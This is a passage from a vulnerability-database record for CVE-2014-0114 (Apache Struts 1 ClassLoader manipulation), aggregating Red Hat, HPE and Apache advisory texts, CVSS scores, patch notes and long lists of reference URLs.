\n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-0114\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0\nhttps://access.redhat.com/documentation/en-us/red_hat_amq/7.5/\n\n7. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7\ngh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso\nQlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ\nqWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m\nGLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm\nYcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv\nSTakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7\nmPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts\nUYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No\nRuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG\nlRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm\n9D+Pu+r8KbU=kdcn\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. 
The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n - CVE-2015-5652 - Python, elevation of privilege\n - CVE-2013-6429 - Spring Framework, cross-site request forgery\n - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP SiteScope Monitors Software Series 11.2x–11.32IP1\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2013-6429\n 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0050\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0107\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0114\n 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-3253\n 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-5652\n 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-0763\n 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. 
\n\n **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be found in the personal zone in \"my updates\" in\nHPE Software Support Online: <https://softwaresupport.hpe.com>. \n\n\n * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251>\n\n\n * Apache Struts: KM02553983 (CVE-2014-0114):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983>\n\n\n * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990>\n\n * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991>\n\n * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992>\n\n * Python: KM02553997 (CVE-2015-5652):\n\n *\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997>\n\n * Spring Framework: KM02553998 (CVE-2013-6429):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998>\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer's patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. 
\n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\nApache Struts project team can recommend a first mitigation that is\nrelatively simple to apply. 
It involves the introduction of a generic\nServlet filter, adding the possibility to blacklist unacceptable request\nparameters based on regular expressions. Please see the corresponding HP\nFortify blog entry [2] for detailed instructions. Based\non this information, the Apache Struts project team recommends to apply\nthe mitigation advice *immediately* for all Struts 1 based applications. \n\nStruts 1 has had its End-Of-Life announcement more than one year ago\n[3]. However, in a cross project effort the Struts team is looking for a\ncorrection or an improved mitigation path. Please stay tuned for further\ninformation regarding a solution. \n\nThis is a cross-list posting. If you have questions regarding this\nreport, please direct them to security@struts.apache.org only. \n\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\n[2]\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\n[3] http://struts.apache.org/struts1eol-announcement.html\n\n-- \nRené Gielen\nhttp://twitter.com/rgielen\n", sources: [ { db: "NVD", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "VULMON", id: "CVE-2014-0114", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, ], trust: 2.16, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=41690", trust: 0.1, type: "exploit", }, ], sources: [ { db: "VULMON", id: 
"CVE-2014-0114", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2014-0114", trust: 3, }, { db: "BID", id: "67121", trust: 1.9, }, { db: "SECUNIA", id: "59118", trust: 1.6, }, { db: "SECUNIA", id: "59480", trust: 1.6, }, { db: "SECUNIA", id: "59246", trust: 1.6, }, { db: "SECUNIA", id: "60177", trust: 1.6, }, { db: "SECUNIA", id: "59479", trust: 1.6, }, { db: "SECUNIA", id: "58710", trust: 1.6, }, { db: "SECUNIA", id: "59718", trust: 1.6, }, { db: "SECUNIA", id: "59430", trust: 1.6, }, { db: "SECUNIA", id: "59464", trust: 1.6, }, { db: "SECUNIA", id: "58851", trust: 1.6, }, { db: "SECUNIA", id: "59228", trust: 1.6, }, { db: "SECUNIA", id: "59704", trust: 1.6, }, { db: "SECUNIA", id: "59014", trust: 1.6, }, { db: "SECUNIA", id: "57477", trust: 1.6, }, { db: "SECUNIA", id: "59245", trust: 1.6, }, { db: "SECUNIA", id: "58947", trust: 1.6, }, { db: "SECUNIA", id: "60703", trust: 1.6, }, { db: "OPENWALL", id: "OSS-SECURITY/2014/07/08/1", trust: 1.6, }, { db: "OPENWALL", id: "OSS-SECURITY/2014/06/15/10", trust: 1.6, }, { db: "HITACHI", id: "HS14-018", trust: 0.9, }, { db: "HITACHI", id: "HS14-020", trust: 0.9, }, { db: "JUNIPER", id: "JSA10643", trust: 0.9, }, { db: "JVN", id: "JVN30962312", trust: 0.9, }, { db: "CS-HELP", id: "SB2022072128", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1427", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1089", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.3134", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.2355", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.0544", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.2568", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2293.2", trust: 0.6, }, { db: "ICS CERT", id: "ICSMA-20-184-01", trust: 0.6, }, { db: "CNNVD", id: "CNNVD-201404-581", trust: 0.6, }, { db: "VULMON", id: 
"CVE-2014-0114", trust: 0.1, }, { db: "PACKETSTORM", id: "149311", trust: 0.1, }, { db: "PACKETSTORM", id: "126619", trust: 0.1, }, { db: "PACKETSTORM", id: "126692", trust: 0.1, }, { db: "PACKETSTORM", id: "149050", trust: 0.1, }, { db: "PACKETSTORM", id: "127868", trust: 0.1, }, { db: "PACKETSTORM", id: "137980", trust: 0.1, }, { db: "PACKETSTORM", id: "154792", trust: 0.1, }, { db: "PACKETSTORM", id: "128873", trust: 0.1, }, { db: "PACKETSTORM", id: "139721", trust: 0.1, }, { db: "PACKETSTORM", id: "126455", trust: 0.1, }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, id: "VAR-201404-0288", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VARIoT devices database", id: null, }, ], trust: 0.4253262875, }, last_update_date: "2024-11-29T21:26:04.405000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "struts-1.2.9-4jpp.8.el5_10.src", trust: 0.6, url: "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743", }, { title: "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20192995 - Security Advisory", }, { title: "Debian 
CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=96f4091aa31a0ece729fdcb110066df5", }, { title: "Red Hat: CVE-2014-0114", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2014-0114", }, { title: "Red Hat: Important: Fuse 7.1 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20182669 - Security Advisory", }, { title: "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=f5bb2b180c7c77e5a02747a1f31830d9", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2019", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=f655264a6935505d167bbf45f409a57b", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=81c63752a6f26433af2128b2e8c02385", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=e2a7f287e9acc8c64ab3df71130bc64d", }, { title: "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=55ea315dfb69fce8383762ac64250315", }, { title: "Oracle: Oracle Critical Patch Update Advisory - April 2017", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=143b3fb255063c81571469eaa3cf0a87", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2017", trust: 0.1, url: 
"https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=523d3f220a64ff01dd95e064bd37566a", }, { title: "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=68c6989b84f14aaac220c13b754c7702", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2015", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=4a692d6d60aa31507cb101702b494c51", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=5f8c525f1408011628af1792207b2099", }, { title: "struts1-patch", trust: 0.1, url: "https://github.com/ricedu/struts1-patch ", }, { title: "", trust: 0.1, url: "https://github.com/weblegacy/struts1 ", }, { title: "struts1filter", trust: 0.1, url: "https://github.com/rgielen/struts1filter ", }, { title: "StrutsExample", trust: 0.1, url: "https://github.com/vikasvns2000/StrutsExample ", }, { title: "struts-mini", trust: 0.1, url: "https://github.com/bingcai/struts-mini ", }, { title: "strutt-cve-2014-0114", trust: 0.1, url: "https://github.com/anob3it/strutt-cve-2014-0114 ", }, { title: "super-pom", trust: 0.1, url: "https://github.com/ian4hu/super-pom ", }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2014-0114", }, ], }, references: { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.8, url: "http://www.securityfocus.com/bid/67121", }, { trust: 2.5, url: "http://www.vmware.com/security/advisories/vmsa-2014-0008.html", }, { trust: 2.2, url: "http://www.vmware.com/security/advisories/vmsa-2014-0012.html", }, { trust: 2.2, url: "http://www.debian.org/security/2014/dsa-2940", }, { trust: 2.2, url: "http://www.ibm.com/support/docview.wss?uid=swg21675496", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042296", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { trust: 1.9, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", }, { trust: 1.9, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676303", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675266", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676110", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677110", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675689", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674812", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674128", }, { trust: 1.9, url: 
"http://www-01.ibm.com/support/docview.wss?uid=swg21675972", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2018:2669", }, { trust: 1.7, url: "http://advisories.mageia.org/mgasa-2014-0219.html", }, { trust: 1.7, url: "https://security.gentoo.org/glsa/201607-09", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2019:2995", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e", }, { trust: 1.6, url: "http://openwall.com/lists/oss-security/2014/06/15/10", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://issues.apache.org/jira/browse/beanutils-463", }, { trust: 1.6, url: "http://secunia.com/advisories/57477", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675898", }, { trust: 1.6, url: "http://openwall.com/lists/oss-security/2014/07/08/1", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://security.netapp.com/advisory/ntap-20140911-0001/", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59430", }, { trust: 1.6, url: "http://seclists.org/fulldisclosure/2014/dec/23", }, { trust: 1.6, url: "http://secunia.com/advisories/58851", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59704", }, { trust: 1.6, 
url: "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59480", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676091", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59246", }, { trust: 1.6, url: "http://secunia.com/advisories/59245", }, { trust: 1.6, url: "http://secunia.com/advisories/59479", }, { trust: 1.6, url: "http://secunia.com/advisories/59118", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html", }, { trust: 1.6, url: "http://secunia.com/advisories/58947", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: 
"https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1091938", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59014", }, { trust: 1.6, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1116665", }, { trust: 1.6, url: "http://secunia.com/advisories/58710", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675387", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { trust: 1.6, url: 
"https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 1.6, url: "http://www.securityfocus.com/archive/1/534161/100/0/threaded", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e", }, { trust: 1.6, url: "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59464", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=140119284401582&w=2", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=141451023707502&w=2", }, { trust: 1.6, url: "http://secunia.com/advisories/59228", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676931", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676375", }, { trust: 